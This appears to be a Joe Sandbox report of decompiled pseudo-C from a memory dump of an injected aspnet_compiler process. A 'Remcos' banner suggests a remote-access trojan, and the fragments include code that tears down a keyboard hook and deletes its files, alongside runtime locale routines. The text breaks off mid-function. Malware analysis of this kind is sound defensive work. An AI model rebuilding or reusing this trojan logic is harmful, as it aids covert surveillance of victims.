                Uniqueness Score: -1.00%

                C-Code - Quality: 54%
                			E0041B663() {
                				struct _CONSOLE_SCREEN_BUFFER_INFO _v28;
                				void* _t9;
                				void* _t12;
                
                				_t9 = GetStdHandle(0xfffffff5);
                				GetConsoleScreenBufferInfo(_t9,  &_v28);
                				SetConsoleTextAttribute(_t9, 0xc);
                				_push("\n\t ______                              \n\t(_____ \\                             \n\t _____) )_____ ____   ____ ___   ___ \n\t|  __  /| ___ |    \\ / ___) _ \\ /___)\n\t| |  \\ \\| ____| | | ( (__| |_| |___ |\n\t|_|   |_|_____)_|_|_|\\____)___/(___/ \n");
                				E00406874(_t12);
                				return SetConsoleTextAttribute(_t9, _v28.wAttributes & 0x0000ffff);
                 			}

                APIs
                • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041B6F8), ref: 0041B66D
                • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041B6F8), ref: 0041B67A
                • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041B6F8), ref: 0041B687
                • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041B6F8), ref: 0041B69A
                Strings
                • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041B68D
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Console$AttributeText$BufferHandleInfoScreen
                • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                • API String ID: 3024135584-2418719853
                • Opcode ID: b5101502732423ef893627347f2af24e4f93fc0e171d4abeb9243736e4473fa4
                • Instruction ID: ad478a08908ae1e8722594817e35ebd278399d2ab3723c686487d6c51551703d
                • Opcode Fuzzy Hash: b5101502732423ef893627347f2af24e4f93fc0e171d4abeb9243736e4473fa4
                • Instruction Fuzzy Hash: D0E04F62648708ABD3103FB6BC4EC6F7B7DE785623F101636FA1291293E974841086B5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 80%
                			E0040AE1C() {
                				signed int _t15;
                
                				 *0x473089 = 0;
                				TerminateThread(E00409880, 0);
                				if( *0x473040 != 0) {
                					__eax = UnhookWindowsHookEx(__eax);
                					 *0x473040 = 0;
                					__eax = TerminateThread(E0040986A, 0);
                				}
                				_pop(0);
                				_push(0);
                				_t25 = DeleteFileW(E00401EE4(0x4730a0));
                				_t15 = 0 | DeleteFileW(E00401EE4(0x4730a0)) != 0x00000000;
                				if(E00406E2B(_t25) != 0) {
                					RemoveDirectoryW(E00401EE4(0x4730b8));
                				}
                				return _t15;
                 			}

                APIs
                • TerminateThread.KERNEL32(00409880,00000000,pth_unenc,0040C5C1,00473220,00473238,?,pth_unenc), ref: 0040AE2B
                • UnhookWindowsHookEx.USER32(?), ref: 0040AE3B
                • TerminateThread.KERNEL32(0040986A,00000000,?,pth_unenc), ref: 0040AE4D
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: TerminateThread$HookUnhookWindows
                • String ID: @0G$pth_unenc
                • API String ID: 3123878439-155138683
                • Opcode ID: 115079c2282a6bf9576d9e0b7d13f6b7bc05c6b49fdad65596f4409ad05b5654
                • Instruction ID: e1e5eea1f7390eadd48dce0aa84519ec7b6f9c8f196e89bb690cf3ca84e6fe29
                • Opcode Fuzzy Hash: 115079c2282a6bf9576d9e0b7d13f6b7bc05c6b49fdad65596f4409ad05b5654
                • Instruction Fuzzy Hash: 81E0EC616553809FD7106F60BC98A62775AB606B47310807AF506A62A6C73C8E44A6AF
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 96%
                			E0043FC6A(void* __ebx, void* __edx, void* __edi, void* __esi, char* _a4, short* _a8, int _a12, intOrPtr _a16) {
                				signed int _v8;
                				char _v16;
                				int _v20;
                				int _v24;
                				char* _v28;
                				int _v32;
                				char _v36;
                				intOrPtr _v44;
                				char _v48;
                				signed int _t59;
                				char* _t61;
                				intOrPtr _t63;
                				int _t64;
                				intOrPtr* _t65;
                				signed int _t68;
                				intOrPtr* _t71;
                				short* _t73;
                				int _t74;
                				int _t76;
                				char _t78;
                				short* _t83;
                				short _t85;
                				int _t91;
                				int _t93;
                				char* _t98;
                				int _t103;
                				char* _t105;
                				void* _t106;
                				intOrPtr _t108;
                				intOrPtr _t109;
                				int _t110;
                				short* _t113;
                				int _t114;
                				int _t116;
                				signed int _t117;
                
                				_t106 = __edx;
                				_t59 =  *0x46f00c; // 0xd60a1515
                				_v8 = _t59 ^ _t117;
                				_t61 = _a4;
                				_t91 = _a12;
                				_t116 = 0;
                				_v28 = _t61;
                				_v20 = 0;
                				_t113 = _a8;
                				_v24 = _t113;
                				if(_t61 == 0 || _t91 != 0) {
                					if(_t113 != 0) {
                						E004390B7(_t91,  &_v48, _t106, _a16);
                						_t98 = _v28;
                						if(_t98 == 0) {
                							_t63 = _v44;
                							if( *((intOrPtr*)(_t63 + 0xa8)) != _t116) {
                								_t64 = WideCharToMultiByte( *(_t63 + 8), _t116, _t113, 0xffffffff, _t116, _t116, _t116,  &_v20);
                								if(_t64 == 0 || _v20 != _t116) {
                									L55:
                									_t65 = E0043EEAD();
                									_t114 = _t113 | 0xffffffff;
                									 *_t65 = 0x2a;
                									goto L56;
                								} else {
                									_t53 = _t64 - 1; // -1
                									_t114 = _t53;
                									L56:
                									if(_v36 != 0) {
                										 *(_v48 + 0x350) =  *(_v48 + 0x350) & 0xfffffffd;
                									}
                									goto L59;
                								}
                							}
                							_t68 =  *_t113 & 0x0000ffff;
                							if(_t68 == 0) {
                								L51:
                								_t114 = _t116;
                								goto L56;
                							}
                							while(_t68 <= 0xff) {
                								_t113 =  &(_t113[1]);
                								_t116 = _t116 + 1;
                								_t68 =  *_t113 & 0x0000ffff;
                								if(_t68 != 0) {
                									continue;
                								}
                								goto L51;
                							}
                							goto L55;
                						}
                						_t108 = _v44;
                						if( *((intOrPtr*)(_t108 + 0xa8)) != _t116) {
                							if( *((intOrPtr*)(_t108 + 4)) != 1) {
                								_t114 = WideCharToMultiByte( *(_t108 + 8), _t116, _t113, 0xffffffff, _t98, _t91, _t116,  &_v20);
                								if(_t114 == 0) {
                									if(_v20 != _t116 || GetLastError() != 0x7a) {
                										L45:
                										_t71 = E0043EEAD();
                										_t116 = _t116 | 0xffffffff;
                										 *_t71 = 0x2a;
                										goto L51;
                									} else {
                										if(_t91 == 0) {
                											goto L56;
                										}
                										_t73 = _v24;
                										while(1) {
                											_t109 = _v44;
                											_t103 =  *(_t109 + 4);
                											if(_t103 > 5) {
                												_t103 = 5;
                											}
                											_t74 = WideCharToMultiByte( *(_t109 + 8), _t116, _t73, 1,  &_v16, _t103, _t116,  &_v20);
                											_t93 = _a12;
                											_t110 = _t74;
                											if(_t110 == 0 || _v20 != _t116 || _t110 < 0 || _t110 > 5) {
                												goto L55;
                											}
                											if(_t110 + _t114 > _t93) {
                												goto L56;
                											}
                											_t76 = _t116;
                											_v32 = _t76;
                											if(_t110 <= 0) {
                												L43:
                												_t73 = _v24 + 2;
                												_v24 = _t73;
                												if(_t114 < _t93) {
                													continue;
                												}
                												goto L56;
                											}
                											_t105 = _v28;
                											while(1) {
                												_t78 =  *((intOrPtr*)(_t117 + _t76 - 0xc));
                												 *((char*)(_t105 + _t114)) = _t78;
                												if(_t78 == 0) {
                													goto L56;
                												}
                												_t76 = _v32 + 1;
                												_t114 = _t114 + 1;
                												_v32 = _t76;
                												if(_t76 < _t110) {
                													continue;
                												}
                												goto L43;
                											}
                											goto L56;
                										}
                										goto L55;
                									}
                								}
                								if(_v20 != _t116) {
                									goto L45;
                								}
                								_t28 = _t114 - 1; // -1
                								_t116 = _t28;
                								goto L51;
                							}
                							if(_t91 == 0) {
                								L21:
                								_t116 = WideCharToMultiByte( *(_t108 + 8), _t116, _t113, _t91, _t98, _t91, _t116,  &_v20);
                								if(_t116 == 0 || _v20 != 0) {
                									goto L45;
                								} else {
                									if(_v28[_t116 - 1] == 0) {
                										_t116 = _t116 - 1;
                									}
                									goto L51;
                								}
                							}
                							_t83 = _t113;
                							_v24 = _t91;
                							while( *_t83 != _t116) {
                								_t83 =  &(_t83[1]);
                								_t16 =  &_v24;
                								 *_t16 = _v24 - 1;
                								if( *_t16 != 0) {
                									continue;
                								}
                								break;
                							}
                							if(_v24 != _t116 &&  *_t83 == _t116) {
                								_t91 = (_t83 - _t113 >> 1) + 1;
                							}
                							goto L21;
                						}
                						if(_t91 == 0) {
                							goto L51;
                						}
                						while( *_t113 <= 0xff) {
                							_t98[_t116] =  *_t113;
                							_t85 =  *_t113;
                							_t113 =  &(_t113[1]);
                							if(_t85 == 0) {
                								goto L51;
                							}
                							_t116 = _t116 + 1;
                							if(_t116 < _t91) {
                								continue;
                							}
                							goto L51;
                						}
                						goto L45;
                					}
                					 *((intOrPtr*)(E0043EEAD())) = 0x16;
                					E0043A5BB();
                					goto L59;
                				} else {
                					L59:
                					return E004338BB(_v8 ^ _t117);
                				}
                			}

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d077a8b190852e3b7fe11e6cef96461035acd321b12386ca60cae5b871db1d14
                • Instruction ID: 060016eacbcb527956992f75cf2bc0db82b48ac299cd878c71906e1bf1d9a011
                • Opcode Fuzzy Hash: d077a8b190852e3b7fe11e6cef96461035acd321b12386ca60cae5b871db1d14
                • Instruction Fuzzy Hash: 9D71F432D002169BCF218F55C845ABFBB75EF49310F14613BE811672A2D7789D49CBA9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 73%
                			E004435FC(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                				signed int _v8;
                				signed int _v12;
                				signed int _v16;
                				signed int _v36;
                				signed int _v40;
                				intOrPtr _v44;
                				signed int _v56;
                				char _v276;
                				short _v278;
                				short _v280;
                				char _v448;
                				signed int _v452;
                				signed int _v456;
                				short _v458;
                				intOrPtr _v460;
                				intOrPtr _v464;
                				signed int _v468;
                				signed int _v472;
                				intOrPtr _v508;
                				char _v536;
                				signed int _v540;
                				intOrPtr _v544;
                				signed int _v556;
                				char _v708;
                				signed int _v712;
                				signed int _v716;
                				short _v718;
                				signed int* _v720;
                				signed int _v724;
                				signed int _v728;
                				signed int _v732;
                				signed int* _v736;
                				signed int _v740;
                				signed int _v744;
                				signed int _v748;
                				signed int _v752;
                				char _v820;
                				char _v1248;
                				char _v1256;
                				intOrPtr _v1276;
                				signed int _v1292;
                				signed int _t241;
                				void* _t244;
                				signed int _t247;
                				signed int _t249;
                				signed int _t255;
                				signed int _t256;
                				signed int _t257;
                				signed int _t258;
                				signed int _t259;
                				signed int _t261;
                				signed int _t263;
                				void* _t265;
                				signed int _t266;
                				signed int _t267;
                				signed int _t268;
                				signed int _t270;
                				signed int _t273;
                				signed int _t280;
                				signed int _t281;
                				signed int _t282;
                				intOrPtr _t283;
                				signed int _t286;
                				signed int _t290;
                				signed int _t291;
                				intOrPtr _t293;
                				signed int _t296;
                				signed int _t297;
                				signed int _t299;
                				signed int _t319;
                				signed int _t320;
                				signed int _t323;
                				signed int _t328;
                				void* _t330;
                				signed int _t332;
                				void* _t333;
                				intOrPtr _t334;
                				signed int _t339;
                				signed int _t340;
                				intOrPtr* _t343;
                				signed int _t357;
                				signed int _t359;
                				signed int _t361;
                				intOrPtr* _t362;
                				signed int _t364;
                				signed int _t370;
                				intOrPtr* _t374;
                				intOrPtr* _t377;
                				void* _t380;
                				intOrPtr* _t381;
                				intOrPtr* _t382;
                				signed int _t393;
                				signed int _t396;
                				intOrPtr* _t397;
                				signed int _t399;
                				signed int* _t403;
                				intOrPtr* _t410;
                				intOrPtr* _t411;
                				signed int _t421;
                				short _t422;
                				void* _t424;
                				signed int _t425;
                				signed int _t427;
                				intOrPtr _t428;
                				signed int _t431;
                				intOrPtr _t432;
                				signed int _t434;
                				signed int _t437;
                				intOrPtr _t443;
                				signed int _t444;
                				signed int _t446;
                				signed int _t447;
                				signed int _t450;
                				signed int _t452;
                				signed int _t456;
                				signed int* _t457;
                				intOrPtr* _t458;
                				short _t459;
                				void* _t461;
                				signed int _t463;
                				signed int _t465;
                				void* _t467;
                				void* _t468;
                				void* _t470;
                				signed int _t471;
                				void* _t472;
                				void* _t474;
                				signed int _t475;
                				void* _t477;
                				void* _t479;
                				intOrPtr _t491;
                
                				_t420 = __edx;
                				_t461 = _t467;
                				_t468 = _t467 - 0xc;
                				_push(__ebx);
                				_push(__esi);
                				_v12 = 1;
                				_t357 = E00444A38(__ecx, 0x6a6);
                				_t240 = 0;
                				_pop(_t370);
                				if(_t357 == 0) {
                					L20:
                					return _t240;
                				} else {
                					_push(__edi);
                					_t2 = _t357 + 4; // 0x4
                					_t427 = _t2;
                					 *_t427 = 0;
                					 *_t357 = 1;
                					_t443 = _a4;
                					_t4 = _t443 + 0x30; // 0x442dfb
                					_t241 = _t4;
                					_push( *_t241);
                					_v16 = _t241;
                					_push(0x45b570);
                					_push( *0x45b42c);
                					E0044353B(_t357, _t370, __edx, _t427, _t443, _t427, 0x351, 3);
                					_t470 = _t468 + 0x18;
                					_v8 = 0x45b42c;
                					while(1) {
                						L2:
                						_t244 = E0044E807(_t427, 0x351, ";");
                						_t471 = _t470 + 0xc;
                						if(_t244 != 0) {
                							break;
                						} else {
                							_t8 = _v16 + 0x10; // 0x10
                							_t410 = _t8;
                							_t339 =  *_v16;
                							_v16 = _t410;
                							_t411 =  *_t410;
                							goto L4;
                						}
                						while(1) {
                							L4:
                							_t420 =  *_t339;
                							if(_t420 !=  *_t411) {
                								break;
                							}
                							if(_t420 == 0) {
                								L8:
                								_t340 = 0;
                							} else {
                								_t420 =  *((intOrPtr*)(_t339 + 2));
                								if(_t420 !=  *((intOrPtr*)(_t411 + 2))) {
                									break;
                								} else {
                									_t339 = _t339 + 4;
                									_t411 = _t411 + 4;
                									if(_t420 != 0) {
                										continue;
                									} else {
                										goto L8;
                									}
                								}
                							}
                							L10:
                							asm("sbb eax, eax");
                							_t370 = _v8 + 0xc;
                							_v8 = _t370;
                							_v12 = _v12 &  !( ~_t340);
                							_t343 = _v16;
                							_v16 = _t343;
                							_push( *_t343);
                							_push(0x45b570);
                							_push( *_t370);
                							E0044353B(_t357, _t370, _t420, _t427, _t443, _t427, 0x351, 3);
                							_t470 = _t471 + 0x18;
                							if(_v8 < 0x45b45c) {
                								goto L2;
                							} else {
                								if(_v12 != 0) {
                									E00445002(_t357);
                									_t31 = _t443 + 0x28; // 0x30ff068b
                									_t434 = _t427 | 0xffffffff;
                									__eflags =  *_t31;
                									if(__eflags != 0) {
                										asm("lock xadd [ecx], eax");
                										if(__eflags == 0) {
                											_t32 = _t443 + 0x28; // 0x30ff068b
                											E00445002( *_t32);
                										}
                									}
                									_t33 = _t443 + 0x24; // 0x30ff0c46
                									__eflags =  *_t33;
                									if( *_t33 != 0) {
                										asm("lock xadd [eax], edi");
                										__eflags = _t434 == 1;
                										if(_t434 == 1) {
                											_t34 = _t443 + 0x24; // 0x30ff0c46
                											E00445002( *_t34);
                										}
                									}
                									 *(_t443 + 0x24) = 0;
                									 *(_t443 + 0x1c) = 0;
                									 *(_t443 + 0x28) = 0;
                									 *((intOrPtr*)(_t443 + 0x20)) = 0;
                									_t39 = _t443 + 0x40; // 0x10468b00
                									_t240 =  *_t39;
                								} else {
                									_t20 = _t443 + 0x28; // 0x30ff068b
                									_t437 = _t427 | 0xffffffff;
                									_t491 =  *_t20;
                									if(_t491 != 0) {
                										asm("lock xadd [ecx], eax");
                										if(_t491 == 0) {
                											_t21 = _t443 + 0x28; // 0x30ff068b
                											E00445002( *_t21);
                										}
                									}
                									_t22 = _t443 + 0x24; // 0x30ff0c46
                									if( *_t22 != 0) {
                										asm("lock xadd [eax], edi");
                										if(_t437 == 1) {
                											_t23 = _t443 + 0x24; // 0x30ff0c46
                											E00445002( *_t23);
                										}
                									}
                									 *(_t443 + 0x24) =  *(_t443 + 0x24) & 0x00000000;
                									_t26 = _t357 + 4; // 0x4
                									_t240 = _t26;
                									 *(_t443 + 0x1c) =  *(_t443 + 0x1c) & 0x00000000;
                									 *(_t443 + 0x28) = _t357;
                									 *((intOrPtr*)(_t443 + 0x20)) = _t240;
                								}
                								goto L20;
                							}
                							goto L130;
                						}
                						asm("sbb eax, eax");
                						_t340 = _t339 | 0x00000001;
                						__eflags = _t340;
                						goto L10;
                					}
                					_push(0);
                					_push(0);
                					_push(0);
                					_push(0);
                					_push(0);
                					E0043A5E8();
                					asm("int3");
                					_push(_t461);
                					_t463 = _t471;
                					_t472 = _t471 - 0x1d0;
                					_t247 =  *0x46f00c; // 0xd60a1515
                					_v56 = _t247 ^ _t463;
                					_t249 = _v40;
                					_push(_t357);
                					_push(_t443);
                					_t444 = _v36;
                					_push(_t427);
                					_t428 = _v44;
                					_v508 = _t428;
                					__eflags = _t249;
                					if(_t249 == 0) {
                						_v456 = 1;
                						_v468 = 0;
                						_t359 = 0;
                						_v452 = 0;
                						__eflags = _t444;
                						if(__eflags == 0) {
                							L79:
                							E004435FC(_t359, _t370, _t420, _t428, _t444, __eflags, _t428);
                							goto L80;
                						} else {
                							__eflags =  *_t444 - 0x4c;
                							if( *_t444 != 0x4c) {
                								L58:
                								_push(0);
                								_t255 = E004431C4(_t359, _t420, _t428, _t444, _t444,  &_v276, 0x83,  &_v448, 0x55);
                								_t474 = _t472 + 0x18;
                								__eflags = _t255;
                								if(_t255 != 0) {
                									_t370 = 0;
                									__eflags = 0;
                									_t76 = _t428 + 0x20; // 0x442deb
                									_t421 = _t76;
                									_t446 = 0;
                									_v452 = _t421;
                									do {
                										__eflags = _t446;
                										if(_t446 == 0) {
                											L73:
                											_t256 = _v456;
                										} else {
                											_t374 =  *_t421;
                											_t257 =  &_v276;
                											while(1) {
                												__eflags =  *_t257 -  *_t374;
                												_t428 = _v464;
                												if( *_t257 !=  *_t374) {
                													break;
                												}
                												__eflags =  *_t257;
                												if( *_t257 == 0) {
                													L66:
                													_t370 = 0;
                													_t258 = 0;
                												} else {
                													_t422 =  *((intOrPtr*)(_t257 + 2));
                													__eflags = _t422 -  *((intOrPtr*)(_t374 + 2));
                													_v458 = _t422;
                													_t421 = _v452;
                													if(_t422 !=  *((intOrPtr*)(_t374 + 2))) {
                														break;
                													} else {
                														_t257 = _t257 + 4;
                														_t374 = _t374 + 4;
                														__eflags = _v458;
                														if(_v458 != 0) {
                															continue;
                														} else {
                															goto L66;
                														}
                													}
                												}
                												L68:
                												__eflags = _t258;
                												if(_t258 == 0) {
                													_t359 = _t359 + 1;
                													__eflags = _t359;
                													goto L73;
                												} else {
                													_t259 =  &_v276;
                													_push(_t259);
                													_push(_t446);
                													_push(_t428);
                													L83();
                													_t421 = _v452;
                													_t474 = _t474 + 0xc;
                													__eflags = _t259;
                													if(_t259 == 0) {
                														_t370 = 0;
                														_t256 = 0;
                														_v456 = 0;
                													} else {
                														_t359 = _t359 + 1;
                														_t370 = 0;
                														goto L73;
                													}
                												}
                												goto L74;
                											}
                											asm("sbb eax, eax");
                											_t258 = _t257 | 0x00000001;
                											_t370 = 0;
                											__eflags = 0;
                											goto L68;
                										}
                										L74:
                										_t446 = _t446 + 1;
                										_t421 = _t421 + 0x10;
                										_v452 = _t421;
                										__eflags = _t446 - 5;
                									} while (_t446 <= 5);
                									__eflags = _t256;
                									if(__eflags != 0) {
                										goto L79;
                									} else {
                										__eflags = _t359;
                										goto L77;
                									}
                								}
                								goto L80;
                							} else {
                								__eflags =  *(_t444 + 2) - 0x43;
                								if( *(_t444 + 2) != 0x43) {
                									goto L58;
                								} else {
                									__eflags =  *((short*)(_t444 + 4)) - 0x5f;
                									if( *((short*)(_t444 + 4)) != 0x5f) {
                										goto L58;
                									} else {
                										while(1) {
                											_t261 = E0044F967(_t444, 0x45b568);
                											_t361 = _t261;
                											_v472 = _t361;
                											_pop(_t376);
                											__eflags = _t361;
                											if(_t361 == 0) {
                												break;
                											}
                											_t263 = _t261 - _t444;
                											__eflags = _t263;
                											_v456 = _t263 >> 1;
                											if(_t263 == 0) {
                												break;
                											} else {
                												_t265 = 0x3b;
                												__eflags =  *_t361 - _t265;
                												if( *_t361 == _t265) {
                													break;
                												} else {
                													_t431 = _v456;
                													_t362 = 0x45b42c;
                													_v460 = 1;
                													do {
                														_t266 = E0044F92D( *_t362, _t444, _t431);
                														_t472 = _t472 + 0xc;
                														__eflags = _t266;
                														if(_t266 != 0) {
                															goto L45;
                														} else {
                															_t377 =  *_t362;
                															_t420 = _t377 + 2;
                															do {
                																_t334 =  *_t377;
                																_t377 = _t377 + 2;
                																__eflags = _t334 - _v468;
                															} while (_t334 != _v468);
                															_t376 = _t377 - _t420 >> 1;
                															__eflags = _t431 - _t377 - _t420 >> 1;
                															if(_t431 != _t377 - _t420 >> 1) {
                																goto L45;
                															}
                														}
                														break;
                														L45:
                														_v460 = _v460 + 1;
                														_t362 = _t362 + 0xc;
                														__eflags = _t362 - 0x45b45c;
                													} while (_t362 <= 0x45b45c);
                													_t359 = _v472 + 2;
                													_t267 = E0044F8DD(_t376, _t359, ";");
                													_t428 = _v464;
                													_t447 = _t267;
                													_pop(_t380);
                													__eflags = _t447;
                													if(_t447 != 0) {
                														L48:
                														__eflags = _v460 - 5;
                														if(_v460 > 5) {
                															_t268 = _v452;
                															goto L54;
                														} else {
                															_push(_t447);
                															_t270 = E0044E949(_t380,  &_v276, 0x83, _t359);
                															_t475 = _t472 + 0x10;
                															__eflags = _t270;
                															if(_t270 != 0) {
                																L82:
                																_push(0);
                																_push(0);
                																_push(0);
                																_push(0);
                																_push(0);
                																E0043A5E8();
                																asm("int3");
                																_push(_t463);
                																_t465 = _t475;
                																_t273 =  *0x46f00c; // 0xd60a1515
                																_v556 = _t273 ^ _t465;
                																_push(_t359);
                																_t364 = _v540;
                																_push(_t447);
                																_push(_t428);
                																_t432 = _v544;
                																_v1292 = _t364;
                																_v1276 = E00446A95(_t364, _t380, _t420) + 0x278;
                																_push( &_v1256);
                																_t280 = E004431C4(_t364, _t420, _t432, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55);
                																_t477 = _t475 - 0x2e4 + 0x18;
                																__eflags = _t280;
                																if(_t280 != 0) {
                																	_t101 = _t364 + 2; // 0x6
                																	_t450 = _t101 << 4;
                																	__eflags = _t450;
                																	_t281 =  &_v280;
                																	_v724 = _t450;
                																	_t381 =  *((intOrPtr*)(_t450 + _t432));
                																	while(1) {
                																		_v712 = _v712 & 0x00000000;
                																		__eflags =  *_t281 -  *_t381;
                																		_t452 = _v724;
                																		if( *_t281 !=  *_t381) {
                																			break;
                																		}
                																		__eflags =  *_t281;
                																		if( *_t281 == 0) {
                																			L91:
                																			_t282 = _v712;
                																		} else {
                																			_t459 =  *((intOrPtr*)(_t281 + 2));
                																			__eflags = _t459 -  *((intOrPtr*)(_t381 + 2));
                																			_v718 = _t459;
                																			_t452 = _v724;
                																			if(_t459 !=  *((intOrPtr*)(_t381 + 2))) {
                																				break;
                																			} else {
                																				_t281 = _t281 + 4;
                																				_t381 = _t381 + 4;
                																				__eflags = _v718;
                																				if(_v718 != 0) {
                																					continue;
                																				} else {
                																					goto L91;
                																				}
                																			}
                																		}
                																		L93:
                																		__eflags = _t282;
                																		if(_t282 != 0) {
                																			_t382 =  &_v280;
                																			_t424 = _t382 + 2;
                																			do {
                																				_t283 =  *_t382;
                																				_t382 = _t382 + 2;
                																				__eflags = _t283 - _v712;
                																			} while (_t283 != _v712);
                																			_v728 = (_t382 - _t424 >> 1) + 1;
                																			_t286 = E00444A38(_t382 - _t424 >> 1, 4 + ((_t382 - _t424 >> 1) + 1) * 2);
                																			_v740 = _t286;
                																			__eflags = _t286;
                																			if(_t286 == 0) {
                																				goto L84;
                																			} else {
                																				_v732 =  *((intOrPtr*)(_t452 + _t432));
                																				_t125 = _t364 * 4; // 0xcea3
                																				_v744 =  *((intOrPtr*)(_t432 + _t125 + 0xa0));
                																				_t128 = _t432 + 8; // 0x8b56ff8b
                																				_v748 =  *_t128;
                																				_t391 =  &_v280;
                																				_v720 = _t286 + 4;
                																				_t290 = E004463E1(_t286 + 4, _v728,  &_v280);
                																				_t479 = _t477 + 0xc;
                																				__eflags = _t290;
                																				if(_t290 != 0) {
                																					_t291 = _v712;
                																					_push(_t291);
                																					_push(_t291);
                																					_push(_t291);
                																					_push(_t291);
                																					_push(_t291);
                																					E0043A5E8();
                																					asm("int3");
                																					_t293 =  *0x470518; // 0x0
                																					return _t293;
                																				} else {
                																					__eflags = _v280 - 0x43;
                																					 *((intOrPtr*)(_t452 + _t432)) = _v720;
                																					if(_v280 != 0x43) {
                																						L102:
                																						_t296 = E00442ED1(_t364, _t391, _t432,  &_v708);
                																						_t393 = _v712;
                																						 *(_t432 + 0xa0 + _t364 * 4) = _t296;
                																					} else {
                																						__eflags = _v278;
                																						if(_v278 != 0) {
                																							goto L102;
                																						} else {
                																							_t393 = _v712;
                																							 *(_t432 + 0xa0 + _t364 * 4) = _t393;
                																						}
                																					}
                																					__eflags = _t364 - 2;
                																					if(_t364 != 2) {
                																						__eflags = _t364 - 1;
                																						if(_t364 != 1) {
                																							__eflags = _t364 - 5;
                																							if(_t364 == 5) {
                																								 *((intOrPtr*)(_t432 + 0x14)) = _v716;
                																							}
                																						} else {
                																							 *((intOrPtr*)(_t432 + 0x10)) = _v716;
                																						}
                																					} else {
                																						_t457 = _v736;
                																						_t425 = _t393;
                																						_t403 = _t457;
                																						 *(_t432 + 8) = _v716;
                																						_v720 = _t457;
                																						_v728 = _t457[8];
                																						_v716 = _t457[9];
                																						while(1) {
                																							_t154 = _t432 + 8; // 0x8b56ff8b
                																							__eflags =  *_t154 -  *_t403;
                																							if( *_t154 ==  *_t403) {
                																								break;
                																							}
                																							_t458 = _v720;
                																							_t425 = _t425 + 1;
                																							_t328 =  *_t403;
                																							 *_t458 = _v728;
                																							_v716 = _t403[1];
                																							_t403 = _t458 + 8;
                																							 *((intOrPtr*)(_t458 + 4)) = _v716;
                																							_t364 = _v752;
                																							_t457 = _v736;
                																							_v728 = _t328;
                																							_v720 = _t403;
                																							__eflags = _t425 - 5;
                																							if(_t425 < 5) {
                																								continue;
                																							} else {
                																							}
                																							L110:
                																							__eflags = _t425 - 5;
                																							if(__eflags == 0) {
                																								_t178 = _t432 + 8; // 0x8b56ff8b
                																								_t319 = E0044F9AC(_t364, _t425, _t432, _t457, __eflags, _v712, 1, 0x45b4e8, 0x7f,  &_v536,  *_t178, 1);
                																								_t479 = _t479 + 0x1c;
                																								__eflags = _t319;
                																								_t320 = _v712;
                																								if(_t319 == 0) {
                																									_t457[1] = _t320;
                																								} else {
                																									do {
                																										 *(_t465 + _t320 * 2 - 0x20c) =  *(_t465 + _t320 * 2 - 0x20c) & 0x000001ff;
                																										_t320 = _t320 + 1;
                																										__eflags = _t320 - 0x7f;
                																									} while (_t320 < 0x7f);
                																									_t323 = E004358BA( &_v536,  *0x46f170, 0xfe);
                																									_t479 = _t479 + 0xc;
                																									__eflags = _t323;
                																									_t457[1] = 0 | _t323 == 0x00000000;
                																								}
                																								_t193 = _t432 + 8; // 0x8b56ff8b
                																								 *_t457 =  *_t193;
                																							}
                																							 *(_t432 + 0x18) = _t457[1];
                																							goto L121;
                																						}
                																						__eflags = _t425;
                																						if(_t425 != 0) {
                																							 *_t457 =  *(_t457 + _t425 * 8);
                																							_t457[1] =  *(_t457 + 4 + _t425 * 8);
                																							 *(_t457 + _t425 * 8) = _v728;
                																							 *(_t457 + 4 + _t425 * 8) = _v716;
                																						}
                																						goto L110;
                																					}
                																					L121:
                																					_t297 = _t364 * 0xc;
                																					_t200 = _t297 + 0x45b428; // 0x40f943
                																					 *0x4574c8(_t432);
                																					_t299 =  *((intOrPtr*)( *_t200))();
                																					_t396 = _v732;
                																					__eflags = _t299;
                																					if(_t299 == 0) {
                																						__eflags = _t396 - 0x46f2a8;
                																						if(_t396 != 0x46f2a8) {
                																							_t456 = _t364 + _t364;
                																							__eflags = _t456;
                																							asm("lock xadd [eax], ecx");
                																							if(_t456 != 0) {
                																								goto L126;
                																							} else {
                																								_t218 = _t456 * 8; // 0x30ff068b
                																								E00445002( *((intOrPtr*)(_t432 + _t218 + 0x28)));
                																								_t221 = _t456 * 8; // 0x30ff0c46
                																								E00445002( *((intOrPtr*)(_t432 + _t221 + 0x24)));
                																								_t224 = _t364 * 4; // 0xcea3
                																								E00445002( *((intOrPtr*)(_t432 + _t224 + 0xa0)));
                																								_t399 = _v712;
                																								 *((intOrPtr*)(_v724 + _t432)) = _t399;
                																								 *(_t432 + 0xa0 + _t364 * 4) = _t399;
                																							}
                																						}
                																						_t397 = _v740;
                																						 *_t397 = 1;
